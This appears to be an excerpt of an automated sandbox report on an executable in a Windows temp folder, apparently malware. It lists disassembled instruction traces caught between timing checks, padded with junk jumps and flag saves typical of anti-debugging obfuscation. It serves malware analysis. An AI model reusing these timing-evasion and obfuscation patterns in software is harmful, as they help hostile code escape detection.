Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504032A second address: 5040406 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F2096h 0x00000008 adc ah, 00000028h 0x0000000b jmp 00007FBF8C4F208Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 mov si, dx 0x0000001a mov di, 3C70h 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007FBF8C4F2099h 0x00000025 sbb ecx, 2221B5F6h 0x0000002b jmp 00007FBF8C4F2091h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FBF8C4F208Ch 0x0000003b adc cx, 3F18h 0x00000040 jmp 00007FBF8C4F208Bh 0x00000045 popfd 0x00000046 mov bl, cl 0x00000048 popad 0x00000049 mov eax, dword ptr [ebp+08h] 0x0000004c pushad 0x0000004d mov di, 56F4h 0x00000051 mov dx, EE60h 0x00000055 popad 0x00000056 and dword ptr [eax], 00000000h 0x00000059 pushad 0x0000005a mov ebx, 2D9A2978h 0x0000005f push eax 0x00000060 push edx 0x00000061 pushfd 0x00000062 jmp 00007FBF8C4F2097h 0x00000067 adc si, 613Eh 0x0000006c jmp 00007FBF8C4F2099h 0x00000071 popfd 0x00000072 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040406 second address: 5040445 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F2A50h 0x00000008 jmp 00007FBF8C4F2A55h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 and dword ptr [eax+04h], 00000000h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF8C4F2A4Dh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020466 second address: 502046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502046A second address: 5020487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020487 second address: 50204BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF8C4F208Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FBF8C4F208Ch 0x00000018 push esi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50204BE second address: 5020514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FBF8C4F2A4Bh 0x00000012 pushfd 0x00000013 jmp 00007FBF8C4F2A58h 0x00000018 or ecx, 76386188h 0x0000001e jmp 00007FBF8C4F2A4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020514 second address: 5020578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F208Fh 0x00000009 and si, 85CEh 0x0000000e jmp 00007FBF8C4F2099h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov edi, 2093105Ch 0x00000022 mov edx, 5F6ED648h 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FBF8C4F2099h 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020578 second address: 502057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502057C second address: 5020582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020582 second address: 5020599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A53h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030E72 second address: 5030E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504013B second address: 5040148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040148 second address: 504014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504014C second address: 5040165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040165 second address: 5040175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506065D second address: 5060677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov di, C338h 0x00000012 push ebx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov ax, di 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060677 second address: 50606B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F208Fh 0x00000008 and al, FFFFFFFEh 0x0000000b jmp 00007FBF8C4F2099h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF8C4F208Dh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606B9 second address: 50606E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, A2h 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBF8C4F2A4Eh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606E7 second address: 50606ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606ED second address: 506072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [778165FCh] 0x0000000d jmp 00007FBF8C4F2A59h 0x00000012 test eax, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop esi 0x00000019 jmp 00007FBF8C4F2A4Fh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506072A second address: 50607E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC252A5h 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 call 00007FBF8C4F2098h 0x00000018 pushfd 0x00000019 jmp 00007FBF8C4F2092h 0x0000001e adc cl, 00000008h 0x00000021 jmp 00007FBF8C4F208Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 mov ecx, eax 0x0000002b jmp 00007FBF8C4F208Fh 0x00000030 xor eax, dword ptr [ebp+08h] 0x00000033 jmp 00007FBF8C4F208Fh 0x00000038 and ecx, 1Fh 0x0000003b pushad 0x0000003c mov bx, cx 0x0000003f pushfd 0x00000040 jmp 00007FBF8C4F2090h 0x00000045 or ah, FFFFFFC8h 0x00000048 jmp 00007FBF8C4F208Bh 0x0000004d popfd 0x0000004e popad 0x0000004f ror eax, cl 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E0 second address: 50607E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E4 second address: 50607E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E8 second address: 50607EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607EE second address: 506080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2099h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506080B second address: 506080F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506080F second address: 506084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, dx 0x0000000f pushfd 0x00000010 jmp 00007FBF8C4F208Bh 0x00000015 sbb si, 141Eh 0x0000001a jmp 00007FBF8C4F2099h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506084A second address: 50608A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 and ecx, 1052BE2Eh 0x0000000f jmp 00007FBF8C4F2A59h 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b retn 0004h 0x0000001e nop 0x0000001f mov esi, eax 0x00000021 lea eax, dword ptr [ebp-08h] 0x00000024 xor esi, dword ptr [006D2014h] 0x0000002a push eax 0x0000002b push eax 0x0000002c push eax 0x0000002d lea eax, dword ptr [ebp-10h] 0x00000030 push eax 0x00000031 call 00007FBF90EC3304h 0x00000036 push FFFFFFFEh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FBF8C4F2A56h 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50608A8 second address: 5060916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FBF8C4F2096h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FBF90EC297Eh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a mov ebx, ecx 0x0000001c push ecx 0x0000001d pop esi 0x0000001e popad 0x0000001f push esi 0x00000020 pushad 0x00000021 movzx esi, bx 0x00000024 movsx ebx, cx 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FBF8C4F2092h 0x00000030 mov ebp, esp 0x00000032 jmp 00007FBF8C4F2090h 0x00000037 pop ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FBF8C4F208Ah 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060916 second address: 506091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506091C second address: 5060922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010008 second address: 501000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501000C second address: 501001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501001E second address: 5010030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010030 second address: 5010119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FBF8C4F2096h 0x00000011 push eax 0x00000012 jmp 00007FBF8C4F208Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movzx eax, di 0x0000001c pushfd 0x0000001d jmp 00007FBF8C4F2091h 0x00000022 or eax, 18DC5716h 0x00000028 jmp 00007FBF8C4F2091h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FBF8C4F208Ch 0x00000038 or ax, 0338h 0x0000003d jmp 00007FBF8C4F208Bh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FBF8C4F2098h 0x00000049 jmp 00007FBF8C4F2095h 0x0000004e popfd 0x0000004f popad 0x00000050 and esp, FFFFFFF8h 0x00000053 jmp 00007FBF8C4F208Eh 0x00000058 xchg eax, ecx 0x00000059 jmp 00007FBF8C4F2090h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FBF8C4F208Dh 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010119 second address: 501012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501020B second address: 5010250 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c pushad 0x0000000d call 00007FBF8C4F2098h 0x00000012 pop eax 0x00000013 popad 0x00000014 popad 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov edi, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d call 00007FBF8C4F2094h 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010250 second address: 50102B1 instructions: 0x00000000 rdtsc 0x00000002 call 00007FBF8C4F2A4Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esp 0x0000000c jmp 00007FBF8C4F2A54h 0x00000011 mov dword ptr [esp], edi 0x00000014 jmp 00007FBF8C4F2A50h 0x00000019 test esi, esi 0x0000001b pushad 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 popad 0x00000021 mov eax, ebx 0x00000023 popad 0x00000024 je 00007FBFFEC70DC7h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBF8C4F2A53h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50102B1 second address: 50102CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50102CE second address: 5010306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A57h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBF8C4F2A4Dh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010306 second address: 501030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501030A second address: 5010310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010310 second address: 50103A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC70391h 0x0000000f jmp 00007FBF8C4F2090h 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FBF8C4F208Eh 0x0000001e adc si, A528h 0x00000023 jmp 00007FBF8C4F208Bh 0x00000028 popfd 0x00000029 mov ch, BAh 0x0000002b popad 0x0000002c or edx, dword ptr [ebp+0Ch] 0x0000002f jmp 00007FBF8C4F208Bh 0x00000034 test edx, 61000000h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FBF8C4F208Bh 0x00000043 or ah, 0000001Eh 0x00000046 jmp 00007FBF8C4F2099h 0x0000004b popfd 0x0000004c mov si, F8E7h 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103A2 second address: 50103CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBF8C4F2A53h 0x00000008 pop esi 0x00000009 mov al, dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FBFFEC70D10h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103CA second address: 50103CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103CE second address: 50103D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103D2 second address: 50103D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103D8 second address: 501041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1FE27324h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 pushfd 0x00000014 jmp 00007FBF8C4F2A52h 0x00000019 sub cx, F1D8h 0x0000001e jmp 00007FBF8C4F2A4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 jne 00007FBFFEC70CD7h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501041C second address: 5010420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010420 second address: 5010426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50007C2 second address: 5000828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2090h 0x00000009 and ch, FFFFFFC8h 0x0000000c jmp 00007FBF8C4F208Bh 0x00000011 popfd 0x00000012 mov edi, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FBF8C4F2097h 0x00000021 and si, 1CBEh 0x00000026 jmp 00007FBF8C4F2099h 0x0000002b popfd 0x0000002c mov ah, A2h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000828 second address: 500085C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2A58h 0x00000009 jmp 00007FBF8C4F2A55h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000974 second address: 50009FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8356h 0x00000007 pushfd 0x00000008 jmp 00007FBF8C4F2097h 0x0000000d sub ecx, 7A4D37DEh 0x00000013 jmp 00007FBF8C4F2099h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007FBF8C4F208Eh 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FBF8C4F208Eh 0x0000002e add esi, 59998F08h 0x00000034 jmp 00007FBF8C4F208Bh 0x00000039 popfd 0x0000003a movzx esi, bx 0x0000003d popad 0x0000003e mov ebx, 00000000h 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50009FB second address: 50009FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50009FF second address: 5000A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A05 second address: 5000A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A0B second address: 5000A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A0F second address: 5000A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A13 second address: 5000A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF8C4F2099h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A38 second address: 5000A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC78387h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A4Dh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A62 second address: 5000AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov bh, cl 0x00000013 mov bx, CE9Ch 0x00000017 popad 0x00000018 mov ecx, esi 0x0000001a pushad 0x0000001b mov esi, ebx 0x0000001d mov di, 90A0h 0x00000021 popad 0x00000022 je 00007FBFFEC77999h 0x00000028 jmp 00007FBF8C4F208Fh 0x0000002d test byte ptr [77816968h], 00000002h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FBF8C4F2095h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000AC3 second address: 5000B0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBFFEC78324h 0x0000000f pushad 0x00000010 mov al, 1Dh 0x00000012 mov dx, 6F8Ch 0x00000016 popad 0x00000017 mov edx, dword ptr [ebp+0Ch] 0x0000001a pushad 0x0000001b mov bh, 24h 0x0000001d call 00007FBF8C4F2A4Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 jmp 00007FBF8C4F2A4Ch 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B0C second address: 5000B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
